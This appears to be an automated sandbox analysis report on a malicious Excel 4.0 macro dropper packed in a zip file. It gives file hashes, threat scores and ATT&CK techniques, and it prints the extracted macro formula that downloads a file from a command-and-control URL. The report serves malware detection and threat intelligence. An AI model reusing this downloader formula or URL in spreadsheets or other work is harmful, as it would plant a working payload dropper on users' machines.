General

  • Target

    5527146056155136.zip

  • Size

    11KB

  • Sample

    210308-k7xk81e2rs

  • MD5

    bda336dfdf5f1db4824bbe1650f7b7cc

  • SHA1

    6767e6b4ea3f2df27fa645af10424e86b8ab4041

  • SHA256

    bb855c66321ea9de7518e375451bb97aaf2e48277dc96384ef8f1ab34c61e1b0

  • SHA512

    e6b0913c54bf530bb6e6b16c7e2e0745e189083863304101b39abce7d64a166b5b4d121144e344a2289808905b5134b1c8e844cd7fe288e51120940c4a8bc06a

  • Score

    10/10

Malware Config

Extracted

  • Rule

    Excel 4.0 XLM Macro

  • C2

    http://xjw10whta03ytgdi.com/inda.xls

Attributes
  • formulas

    =CALL("URLMon","URLDownloadToFileA","JJCCBB",0,"http://xjw10whta03ytgdi.com/inda.xls","..\fkruf.djr",0)

Extracted

  • Language

    xlm4.0

  • Source

    xlm40.dropper

  • URLs

    http://xjw10whta03ytgdi.com/inda.xls

Targets

    • Target

      db51470283d68b4eb4bcaa7ec2479a06d41503cd5862214f97e4f394748b36c3

    • Size

      39KB

    • MD5

      9ef3b3a010179316440db44abbd34e90

    • SHA1

      a5419ce2f80ce760bdf4a7bddd65df4a8a917123

    • SHA256

      db51470283d68b4eb4bcaa7ec2479a06d41503cd5862214f97e4f394748b36c3

    • SHA512

      89f2379072f6f049e3affa1858d745313a1a438cffe9d47489d55731f9004c921e5b0c44da0f2bbc1f9c49424e8cc4dac44cec65603c0fe059ff32a58298ee41

    • Score

      10/10

    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

MITRE ATT&CK Matrix (ATT&CK v6)

  • Defense Evasion

    Modify Registry (T1112): 1

  • Discovery

    Query Registry (T1012): 2

    System Information Discovery (T1082): 2

Tasks